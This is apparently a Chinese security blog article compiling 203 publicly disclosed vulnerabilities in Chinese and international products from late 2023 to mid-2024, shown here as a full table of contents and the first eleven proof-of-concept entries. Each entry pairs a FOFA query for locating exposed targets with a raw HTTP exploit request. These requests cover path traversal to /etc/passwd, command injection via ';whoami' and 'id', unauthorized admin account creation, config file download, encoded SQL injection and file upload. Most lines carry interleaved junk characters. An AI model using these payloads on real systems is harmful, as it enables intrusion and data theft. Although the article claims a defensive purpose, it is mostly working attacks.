互联网公开漏洞整理202309-202406
, k( b8 K6 J' J/ v/ b# L; O道一安全 2024-06-05 07:41 北京, h; I* P4 |4 w
以下文章来源于网络安全新视界 ,作者网络安全新视界
& y' N2 M+ @2 Q, ?9 ?3 |" a3 z5 q: o( v) D) l
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
/ f2 m6 N9 p$ @$ R4 G
% t0 b0 ?& W; {) v% E2 D* e8 \漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。3 x! g2 ]# P3 R
3 M8 H. w! P. G4 v安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。' ?' }7 S; r$ m2 i8 q7 O) T
$ }+ A' g) Q. R; C9 T; C文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
: t6 R0 Z6 X. a- P
! B, o6 @& r" C% T合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
* s% s: Z3 o3 j
( \, I) T6 ]) x) P$ \" ~' J; k% l, g0 Y5 t
声明
; B$ K! Y5 h: ~. k/ |5 f" G' F- _3 I0 w
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。5 T8 [) n# K5 b" P; V* Y' ]7 R1 D' k
: }; `% z# l3 u* P* \有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。5 e; k2 }/ c! R/ A
) k4 V$ q) _. i+ V& p1 |+ i4 W+ i$ C z* t0 ]: Y; j
. R$ E: n2 y4 y- d% m5 M目录
) q! u ?& [1 i8 w' F- T& x( ~/ l/ [% ~' w
01
* l; k3 o3 x" [5 `
k7 L9 `% o. I1. StarRocks MPP数据库未授权访问/ Q9 B6 S5 L! s* ^7 L$ A- ~
2. Casdoor系统static任意文件读取# M+ u4 s4 _4 P# h" `- Z( i
3. EasyCVR智能边缘网关 userlist 信息泄漏8 P" W3 m! ~5 F: y
4. EasyCVR视频管理平台存在任意用户添加
0 ]0 i8 m) @2 F# T) D% ?3 l5. NUUO NVR 视频存储管理设备远程命令执行) k, Y9 T/ g9 \6 I4 ~
6. 深信服 NGAF 任意文件读取
% O; h. x; }1 F( P _4 [7. 鸿运主动安全监控云平台任意文件下载
& ]: H P9 U5 k2 V1 d( l8 U8. 斐讯 Phicomm 路由器RCE
# m7 m3 ^) C7 \9 [, S9. 稻壳CMS keyword 未授权SQL注入
$ O1 ?; W0 V# g) u) N v+ Q' T10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ j% e. c+ W: |' I3 J
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入+ H3 i6 A" k' B, n6 C
12. Jorani < 1.0.2 远程命令执行: e! o5 p p" n/ S( d
13. 红帆iOffice ioFileDown任意文件读取9 \5 p' {9 c# [3 c
14. 华夏ERP(jshERP)敏感信息泄露
% o; M7 t( s1 t0 X/ Z. B9 ~4 T5 p, Q15. 华夏ERP getAllList信息泄露! L; S0 k$ w% j. t5 s' E
16. 红帆HFOffice医微云SQL注入+ z) D* Z! e4 U) G# q6 q
17. 大华 DSS itcBulletin SQL 注入2 E) j% ~8 O1 r1 F$ c- K
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露% E3 F6 p5 N# \# [- ~, t5 Y! G
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
$ V, {" M/ t- B20. 大华ICC智能物联综合管理平台任意文件读取) Z+ z# E& P7 v; e7 r, v' l# L; g% p
21. 大华ICC智能物联综合管理平台random远程代码执行7 @ [! N5 s% R9 m. k: Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
: L. C; b$ f: k2 x4 H23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% [- [2 h. v: ^8 I
24. 用友NC 6.5 accept.jsp任意文件上传
# x: D7 o$ h% H* _/ z* k; I5 L3 z25. 用友NC registerServlet JNDI 远程代码执行
1 J5 a; O* o0 g+ u! X26. 用友NC linkVoucher SQL注入
2 n. d& M) W4 }3 d+ r0 a27. 用友 NC showcontent SQL注入# S8 m8 p* w, V. v+ l$ ?7 |
28. 用友NC grouptemplet 任意文件上传4 b) b, W, O$ n+ p& V
29. 用友NC down/bill SQL注入4 n$ {" g/ F% m. E% t
30. 用友NC importPml SQL注入
2 L, A/ S! k7 L [! ^% i31. 用友NC runStateServlet SQL注入
7 p5 q+ A/ e5 {1 k( g32. 用友NC complainbilldetail SQL注入
8 p p8 `3 p; M p: e33. 用友NC downTax/download SQL注入
7 b; n8 R4 q4 K- i) S0 _& X34. 用友NC warningDetailInfo接口SQL注入
7 `. q! J$ ]: t- \35. 用友NC-Cloud importhttpscer任意文件上传) p2 J4 j3 Q1 y ~* F8 f& |9 `
36. 用友NC-Cloud soapFormat XXE
, Z6 v. ] s& X5 ~8 e9 a+ ^37. 用友NC-Cloud IUpdateService XXE
. [ j% t. Q( ]3 J38. 用友U8 Cloud smartweb2.RPC.d XXE
5 l P# i9 W/ B39. 用友U8 Cloud RegisterServlet SQL注入
: F! N( |2 I2 C7 F- d# g40. 用友U8-Cloud XChangeServlet XXE+ ?4 o& P# o1 j
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入* h& G! [# l8 b y
42. 用友GRP-U8 SmartUpload01 文件上传
2 M' c9 X, }) r3 z. i& d43. 用友GRP-U8 userInfoWeb SQL注入致RCE; z! s; i4 i' a8 y" g% u
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
# S; g0 n- B; ~4 ~6 p% C+ d45. 用友GRP-U8 ufgovbank XXE
4 ~0 b% n4 k* R, C8 D46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ K1 Y2 Z$ _8 |2 ~9 D
47. 用友GRP A++Cloud 政府财务云 任意文件读取8 j0 l/ P c3 D* j; A5 r
48. 用友U8 CRM swfupload 任意文件上传
3 R; x" d/ x6 G; b9 D! K6 R49. 用友U8 CRM系统uploadfile.php接口任意文件上传
8 ^( q# D* {9 h% a% A- A. o% N& o3 C4 O50. QDocs Smart School 6.4.1 filterRecords SQL注入8 x2 ?( g- f0 O2 s
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入3 K* a# ~2 p+ p) K) J
52. 泛微E-Office json_common.php sql注入5 o) N( g9 w7 @* z# H, U i
53. 迪普 DPTech VPN Service 任意文件上传
9 g. l$ M9 u8 w8 U54. 畅捷通T+ getstorewarehousebystore 远程代码执行/ _7 a4 G/ [' R+ C& r
55. 畅捷通T+ getdecallusers信息泄露
; {+ ^" M" j L" L) D" ]' v56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" |- C8 N6 J5 d* R- u+ Z57. 畅捷通T+ keyEdit.aspx SQL注入
$ y+ u0 B+ g9 f58. 畅捷通T+ KeyInfoList.aspx sql注入7 V9 h9 }; G, D4 g, s' b
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
3 t$ C5 v4 w. c$ ]8 x. L2 ?! H60. 百卓Smart管理平台 importexport.php SQL注入1 o! @$ R n& E1 F$ a
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! a' ^' i3 \- |% A62. IP-guard WebServer 远程命令执行
& u1 P4 `+ h: z63. IP-guard WebServer任意文件读取
7 h9 O- x2 z) |4 ?: {64. 捷诚管理信息系统CWSFinanceCommon SQL注入5 z" ~9 h* J9 z4 _: ^7 c( ?
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过( k! L! q5 E; H6 [# S- B/ W& I* c
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入! x+ x! g/ A+ m, H# r
67. 万户ezOFFICE wpsservlet任意文件上传
6 s2 B P2 j6 `( Y& B8 L' t0 b68. 万户ezOFFICE wf_printnum.jsp SQL注入/ U, G6 S! r+ X6 F+ L: a
69. 万户 ezOFFICE contract_gd.jsp SQL注入
2 E! T( ]* l: Q* T6 a70. 万户ezEIP success 命令执行' J5 D0 A8 d3 ?
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 E% l4 N% a- s. U& |72. 致远OA getAjaxDataServlet XXE6 H7 x1 ]" T8 | H3 x
73. GeoServer wms远程代码执行 X g6 T: c; ?% ~' \( i V
74. 致远M3-server 6_1sp1 反序列化RCE, H/ e. g0 W4 {! _' z
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
% ~% F$ w: F; @/ R# K76. 新开普掌上校园服务管理平台service.action远程命令执行- S( a" A7 J& t/ P7 l
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
; K H$ g; v+ Y' J! H2 v9 Z. P78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传( y1 p/ I- K' A& k2 w
79. BYTEVALUE 百为流控路由器远程命令执行5 m" ?3 W4 A+ N/ E
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传 `$ Z9 h5 Y& z; F4 }, l, `
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- K3 j( ]1 ]! { [9 m% ^, r* o& h# ~82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行5 K. t w7 V% ~0 q4 O/ T, l
83. JeecgBoot testConnection 远程命令执行
8 |8 B8 D6 e- g) x- x, p2 U0 {84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 U5 `1 L9 E; u/ J, d9 @; u
85. SysAid On-premise< 23.3.36远程代码执行
L4 o9 A' h& V7 M( W4 U86. 日本tosei自助洗衣机RCE/ b2 |6 {! b' i; e$ i1 m% I
87. 安恒明御安全网关aaa_local_web_preview文件上传
* p% W6 Z! q( `- R& @0 F3 c, N" W88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
9 i5 A. |8 a5 b89. 致远互联FE协作办公平台editflow_manager存在sql注入
7 P5 k( j- f+ X! r% h- ^6 ?90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行0 S2 B! S) K0 z/ h" U4 h5 p" k" c
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
2 V& t) B$ I: T4 f8 c& c/ L92. 海康威视运行管理中心session命令执行* `+ w" s/ B- W6 B( V
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传' ?# m( T6 U2 V8 Y; i
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: r- N4 ~* z3 G95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行1 ^* Z+ g! R# }: [9 F/ `
96. Apache OFBiz 18.12.11 groovy 远程代码执行
k' H' E# j; \- b I4 N97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 l+ ~( T8 E. d/ R
98. SpiderFlow爬虫平台远程命令执行
1 | V; z7 N3 A0 D7 o8 z99. Ncast盈可视高清智能录播系统busiFacade RCE/ J0 g/ F8 h0 t
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
* `8 m# g$ R0 v101. ivanti policy secure-22.6命令注入+ x+ r+ }$ y8 y4 Z7 E& [; \+ v
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
9 G: n: Y0 |4 g5 d0 U3 Y103. Ivanti Pulse Connect Secure VPN XXE
+ Z7 A. P) t/ h0 w X s104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
' n& r5 s# Y3 O3 ~0 _5 g U105. SpringBlade v3.2.0 export-user SQL 注入
; b0 d1 U, M& P: ~) K106. SpringBlade dict-biz/list SQL 注入+ f; R1 C3 q6 J; Y
107. SpringBlade tenant/list SQL 注入
# e4 l2 }" R* r) Y8 r; m8 w6 s" l% B108. D-Tale 3.9.0 SSRF
. C+ U1 r/ e$ J% u0 g) P' O5 k4 x109. Jenkins CLI 任意文件读取
* t+ p! y+ z2 e3 y3 \* r110. Goanywhere MFT 未授权创建管理员$ y' M& A$ X6 r$ h
111. WordPress Plugin HTML5 Video Player SQL注入
* q" ^' u' Y; W$ {112. WordPress Plugin NotificationX SQL 注入1 q; O3 o7 i3 m6 K3 M& \# I4 B: R
113. WordPress Automatic 插件任意文件下载和SSRF- j1 n+ s- F5 q" u' o2 {& V7 b
114. WordPress MasterStudy LMS插件 SQL注入
+ n5 t/ I4 L2 n115. WordPress Bricks Builder <= 1.9.6 RCE/ O* y' d3 r" {6 u& g" R7 }
116. wordpress js-support-ticket文件上传 ?# D* b/ C' u! b$ m* E* t
117. WordPress LayerSlider插件SQL注入& F) I) S* U5 V) `/ I9 ~
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 a6 D" H/ | {* Z h7 c9 z# h119. 北京百绰智能S20后台sysmanageajax.php sql注入
9 g+ [: @- o) V: [& k n, u120. 北京百绰智能S40管理平台导入web.php任意文件上传
. x- y$ ]% g7 }: `; t121. 北京百绰智能S42管理平台userattestation.php任意文件上传) [( U/ b( [0 Y, f# B! O0 W
122. 北京百绰智能s200管理平台/importexport.php sql注入
. ]( }: X ~& u+ U123. Atlassian Confluence 模板注入代码执行8 M- ]& ?6 m- D3 x; }8 a/ f
124. 湖南建研工程质量检测系统任意文件上传3 D- N3 H0 B5 G5 P# W
125. ConnectWise ScreenConnect身份验证绕过+ ~4 k- s2 W& q" `* o6 ]3 R
126. Aiohttp 路径遍历
3 V. W. E6 U9 q127. 广联达Linkworks DataExchange.ashx XXE
% r& S2 r$ h8 v: k+ j4 @128. Adobe ColdFusion 反序列化
1 e, A( L. g* A6 J2 ~( k8 V129. Adobe ColdFusion 任意文件读取
/ s8 _# W# J+ d" b, e# C. Q130. Laykefu客服系统任意文件上传# J0 C- Q& X8 T6 X3 G8 \; \
131. Mini-Tmall <=20231017 SQL注入( ~6 H1 E+ `( ]
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 f# {- W# H: h2 H; {( ]! x: M
133. H5 云商城 file.php 文件上传
7 x( G: `* h8 E134. 网康NS-ASG应用安全网关index.php sql注入
8 B6 c/ s2 w7 }135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
$ W. n, z7 D H4 k0 V5 @136. NextChat cors SSRF) _8 [1 d7 P) ? u! E
137. 福建科立迅通信指挥调度平台down_file.php sql注入
, l% V( `* l0 S" c& _6 z. ?138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" L1 o$ g/ f' b6 n1 f139. 福建科立讯通信指挥调度平台editemedia.php sql注入
) }5 ^: ]- X- G% ~140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入& R+ v( R) g' m; R9 T7 U
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
" x2 N7 W/ P( d) m( v# k& ?142. CMSV6车辆监控平台系统中存在弱密码
" ^ W; k7 t3 W+ {- r0 H ^* u! h143. Netis WF2780 v2.1.40144 远程命令执行3 y4 `( o' C9 h' k, }$ U2 Q! o+ z
144. D-Link nas_sharing.cgi 命令注入
( A3 }, b. \ G8 `, t0 |, `* I9 P145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
: q5 F) Q. c. w146. MajorDoMo thumb.php 未授权远程代码执行2 R! E* ~9 Y) y& Z* x% R& V
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历 F& a" @+ Q; Q8 ~# P7 i$ B( C, [7 d% @
148. CrushFTP 认证绕过模板注入$ Q+ n* L3 c, u9 p0 O
149. AJ-Report开源数据大屏存在远程命令执行
$ b- U' V M6 Q; J150. AJ-Report 1.4.0 认证绕过与远程代码执行: H) ~4 z; h# S( @+ v) Y
151. AJ-Report 1.4.1 pageList sql注入
" }: T7 w+ ? O8 P. {1 @$ r. j152. Progress Kemp LoadMaster 远程命令执行7 U4 z0 n8 B! n5 w$ Z
153. gradio任意文件读取0 q3 F. S/ d. k) m5 E/ D* b
154. 天维尔消防救援作战调度平台 SQL注入
$ |: l6 t2 E* v8 x2 r& _' V/ B$ i155. 六零导航页 file.php 任意文件上传
' I: B# G9 a" t$ o8 t3 Q' b156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 w( k. |2 N2 x- T) n9 b- r& C157. 美特CRM upload.jsp 任意文件上传
" k$ e; U$ m9 N158. Mura-CMS-processAsyncObject存在SQL注入 g; C1 ~" ]% S: D2 n+ b# y
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传 B$ j7 X/ b- u8 \
160. Sonatype Nexus Repository 3目录遍历与文件读取$ W3 t1 {+ l1 n( a# ^
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
5 ~. y) C& K. [7 A6 S; g162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
$ N. T' F4 E, c( e% ]) {' }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
3 i+ \5 }' Z4 C$ _& N' z164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
9 t+ w2 O8 n D7 r165. OrangeHRM 3.3.3 SQL 注入6 ], V3 _ _' l4 W4 t
166. 中成科信票务管理平台SeatMapHandler SQL注入
* H; M$ v% w- u0 {5 E0 I167. 精益价值管理系统 DownLoad.aspx任意文件读取
' F& j' g6 s2 S: Y0 T7 v+ t( Q168. 宏景EHR OutputCode 任意文件读取% j5 O* J: c, B3 Y3 o; a- b: x" `
169. 宏景EHR downlawbase SQL注入
* z. M$ K9 b3 w. ]* d170. 宏景EHR DisplayExcelCustomReport 任意文件读取9 C/ b- ~5 T L
171. 通天星CMSV6车载定位监控平台 SQL注入" J2 L E+ [) B0 E+ s, `! Y0 l) I4 a
172. DT-高清车牌识别摄像机任意文件读取
3 G x9 n% K4 a( M173. Check Point 安全网关任意文件读取
/ j+ F: s% c0 h5 ~7 j174. 金和OA C6 FileDownLoad.aspx 任意文件读取
' m9 B1 d! O& |& M8 H8 a- {175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
3 B1 S% Z7 i; U& ~& {176. 电信网关配置管理系统 rewrite.php 文件上传
) D; t+ _, {; G! o: I177. H3C路由器敏感信息泄露
) o! |. E \% N" r178. H3C校园网自助服务系统-flexfileupload-任意文件上传
& v* A* l& j1 _6 J( W179. 建文工程管理系统存在任意文件读取
( C+ C/ P2 @5 F) m! [, V7 o, y180. 帮管客 CRM jiliyu SQL注入
) u+ X) M. v9 }181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 A# K% m# @, f: s. G4 J5 T' q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建( m9 X0 L2 @9 Y, d0 n( S/ h
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. O) d% @9 P0 m) i5 C# Z1 d
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' _$ t+ h* S: E* d# z185. 瑞友天翼应用虚拟化系统SQL注入; G N3 c U4 p8 C
186. F-logic DataCube3 SQL注入
+ ]( h \2 y; I- z& Y4 Y, }: w" N: Z187. Mura CMS processAsyncObject SQL注入
# s' T9 X/ n, K! F8 p* G. d188. 叁体-佳会视频会议 attachment 任意文件读取& r/ t" h3 s$ K( G9 y9 V
189. 蓝网科技临床浏览系统 deleteStudy SQL注入2 {& J; V4 N, l( i
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 k( \2 u" E h- k; g191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
' Z5 O, `' s9 G5 p7 A6 ?/ g5 P192. 富通天下外贸ERP UploadEmailAttr 任意文件上传! Q5 e6 o9 m7 v2 k% v; z7 z$ c6 f
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行 u/ V) E% I/ b$ i9 B9 V
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: G$ I0 ]! e g. B. f195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 V$ I+ Z, a. K( Y* Z9 u; `
196. 河南省风速科技统一认证平台密码重置
7 i$ K0 ?4 \1 s9 ~, f" g197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入4 b$ X2 r* t: Q- T
198. 阿里云盘 WebDAV 命令注入6 c P! ]( {0 K2 X2 m
199. cockpit系统assetsmanager_upload接口 文件上传2 j, l/ w* ]. A+ F
200. SeaCMS海洋影视管理系统dmku SQL注入. T6 t) x/ {) o/ ~
201. 方正全媒体新闻采编系统 binary SQL注入
0 n5 e) t+ \. i, t* U202. 微擎系统 AccountEdit任意文件上传2 a# F/ x, N: v; H( u1 A4 A$ H
203. 红海云EHR PtFjk 文件上传
, n+ a$ z4 ?; m& m5 E% }# e6 h
+ ^4 _$ w2 W' ?+ B- OPOC列表
4 E( `$ B0 s+ R! i; W8 G) V; ~7 Q7 g. B
02
* f3 z5 {" }2 o9 T/ L9 p, N0 U# D8 _0 J5 h
1. StarRocks MPP数据库未授权访问
3 w6 h: \3 B' f9 ~* |1 U9 KFOFA :title="StarRocks"
+ N/ {; ^' k& S5 nGET /mem_tracker HTTP/1.1- ^/ @1 i# _; Q a1 R6 s# W9 S6 S
Host: URL6 N4 e5 Y; ^& L0 `5 l' h
& _" p3 S- s; t( y' Q" q; n: W# T
1 x' k3 z7 m3 r2. Casdoor系统static任意文件读取
7 j$ l# a( T" J2 hFOFA :title="Casdoor"
6 @0 `0 }$ ^4 Q, ZGET /static/../../../../../../../../../../../etc/passwd HTTP/1.14 z1 [& H3 E& Z" }0 f% I( Q1 N
Host: xx.xx.xx.xx:9999: l9 P+ a4 ?+ }3 r8 o$ i8 B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( t3 F% m0 _9 ]) c" JConnection: close: o; Y) R$ a0 _% G$ U4 A; Z
Accept: */*, r/ G+ i& K N7 C& s3 N1 {
Accept-Language: en
" j! W' s' M, b; e5 E- _6 N, s* HAccept-Encoding: gzip3 o' Z) N. U2 e+ r9 B
1 Y- J! F6 Q$ ^, W2 K4 e* L7 g& \- N" c5 k* t. o: U: ]
3. EasyCVR智能边缘网关 userlist 信息泄漏
4 u9 o t/ \" V9 ?$ h9 HFOFA :title="EasyCVR"
# h: C4 a# d4 F: w% IGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1 Y" G' O, Y. a+ {& \
Host: xx.xx.xx.xx* p9 f! i* Q- q8 m
6 i1 x. M" y2 B% k
, r ~ Q" u( H9 B; [; o( T" |4. EasyCVR视频管理平台存在任意用户添加
4 X% w$ J6 x6 [0 ]6 O0 ^# @FOFA :title="EasyCVR"" Z2 L s1 K' O' `2 c
( h; }4 p& [( X" f: A1 X! e" vpassword更改为自己的密码md5; f6 m ]2 {8 ]' |
POST /api/v1/adduser HTTP/1.1
1 X$ B |- L, W5 }, K) X4 tHost: your-ip, `0 Z( C8 s' A
Content-Type: application/x-www-form-urlencoded; charset=UTF-8: F2 F# w* H# y% B- f
% w3 F; D2 D: \9 l7 q
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
2 \- G* u+ J: ^' m; X$ w+ `2 ?' W$ s2 {8 C& b5 Y2 J' e' u
" l% x2 ?( e% X' z1 W, |, z l3 Q5. NUUO NVR 视频存储管理设备远程命令执行
5 y! a/ v/ v0 K: b2 W7 N# ~9 M, a& SFOFA:title="Network Video Recorder Login"
* r& l5 }/ i6 Z; {/ S* c s* i6 eGET /__debugging_center_utils___.php?log=;whoami HTTP/1.12 v, J' W8 ^7 x2 W
Host: xx.xx.xx.xx
9 Q3 O4 Q* l( {3 H! d; J$ }2 P2 w. K$ A' \# ?" o2 c9 N
/ O( P; X( G# L4 d( M& b( t; x6. 深信服 NGAF 任意文件读取& z, J! I# f& c4 I5 x3 X
FOFA:title="SANGFOR | NGAF"4 H! @1 j! j0 J- W
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
3 M. c/ m R0 d. b1 x% o; h# D+ `. BHost:: y0 F7 Q) b4 ]
5 c" P ^5 _" j) \8 H1 d: b; n5 ~ d9 H2 p( h) A0 I* t
7. 鸿运主动安全监控云平台任意文件下载 j% p$ r+ ]8 a! q
FOFA:body="./open/webApi.html"4 `& B( e/ {) B: Z1 G
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.16 E) F6 O5 \# W+ T# m3 c6 `+ m
Host:& n# l2 }* A1 \- r
" |6 P2 r0 p" H5 U( b" X% C- ]4 L. G
8. 斐讯 Phicomm 路由器RCE
1 c, w7 B* U" B( V# mFOFA:icon_hash="-1344736688": Z6 A" B. M9 ~: I
默认账号admin登录后台后,执行操作
9 F* k) R8 r# s, \6 UPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1! c2 x0 o& A" S( j' I
Host: x.x.x.x9 R* f) H3 S. {& H% O- `# y
Cookie: sysauth=第一步登录获取的cookie
* q" N$ G/ ] c/ y6 k3 k3 \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz; S; G8 O4 ?$ L& k
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+ M9 y' f% B- l
3 p2 G5 i+ N9 E2 p8 E------WebKitFormBoundaryxbgjoytz
& {( h. c0 P6 G" S2 hContent-Disposition: form-data; name="wifiRebootEnablestatus"# W( ]- k4 u5 |6 K2 G) l. p! Y: Z
4 ^1 l- b3 d, e9 C- E. F
%s) l. `: P. ]% e3 E) U- O" y8 [
------WebKitFormBoundaryxbgjoytz' L' A- Y% G5 c. T- N. ]; R5 ~9 d) G: w
Content-Disposition: form-data; name="wifiRebootrange"
& X7 M. `* l6 ^, t4 K: ~! g
; W' H, \4 G- E: W12:00; id;! G5 Y" [: n8 ^
------WebKitFormBoundaryxbgjoytz
+ u5 [2 C4 _! VContent-Disposition: form-data; name="wifiRebootendrange") A" q: f0 w9 ^; R, \
$ q) _2 ~4 u0 L5 e1 ]( n1 d
%s:
/ E- Z' b- W' T" ]------WebKitFormBoundaryxbgjoytz/ z A) c! {4 V8 z! D4 F% z* J4 ?4 d
Content-Disposition: form-data; name="cururl2"6 X" o0 |4 m. C8 {! ^/ `$ T
+ m( B6 s: B, v; D& d' V" M" l! N$ c8 ~% E; ?
------WebKitFormBoundaryxbgjoytz--
7 [; F0 b$ U' O# u7 }) x9 |' l7 U' D7 T
. `1 E) q4 K) P9. 稻壳CMS keyword 未授权SQL注入- r4 g* F# `/ y' d8 _
FOFA:app="Doccms"( m1 b6 x- b: p
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
% j2 k# x0 u1 Z& PHost: x.x.x.x
! P% f$ }1 W4 S" G" O& `. @. k% q/ H& M
2 g+ h! s. j3 o: y% ]( Tpayload为下列语句的二次Url编码+ A: S0 F, ?1 W% ]7 k
3 S; K' j e" a% ?' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
! M0 d9 H" ?) C- a& @& m# N
/ j& G0 t, B0 `10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
* d0 G i4 r5 V3 a$ N' R* ^8 bFOFA:icon_hash="953405444"
) c$ P3 a* V( h: P: G- }! E; m, e3 {% |3 x- `0 }
文件上传后响应中包含上传文件的路径
9 Q( _# z- v3 h b0 ?9 mPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
- V: r- X8 X5 A: V! v/ m$ ?$ k2 \/ S3 hHost: x.x.x.x:xx- {8 K- _1 u/ A# d7 C2 A2 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36% Q: J# @7 z5 N1 g7 E
Content-Length: 197
& E, G d/ i) U0 Y2 u) O* nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) l, r, Z1 m$ g! e. Y0 [0 _6 ZAccept-Encoding: gzip, deflate+ F1 }$ s6 u2 [1 v/ Q, w' B( G
Accept-Language: zh-CN,zh;q=0.9
( n6 H/ {* W6 b0 t& C4 b$ mConnection: close1 I. b* ~4 o# v0 {0 u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
4 z- U* g" o4 E' ~" U* r
r) C: f" Y* X* |4 d, l6 L- s3 V------WebKitFormBoundaryxdgaqmqu9 b4 w6 m- M) g
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
1 s4 h! {& ^5 A ~9 fContent-Type: text/html
" r' V- c% x1 P" D! `: o, ], M! }. X) _' G- Q8 V$ n+ x7 M* m
jmnqjfdsupxgfidopeixbgsxbf
/ L8 N3 R' c7 w------WebKitFormBoundaryxdgaqmqu--
* E8 C5 _, d9 `- ^, C8 W
/ }6 R1 }) V0 i" C" r( u; q9 l' a0 n- L: A }9 K. T, o7 q( w% H3 G, `
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
. O5 H. `8 i# u- SFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"+ l( A8 O. Y* ~
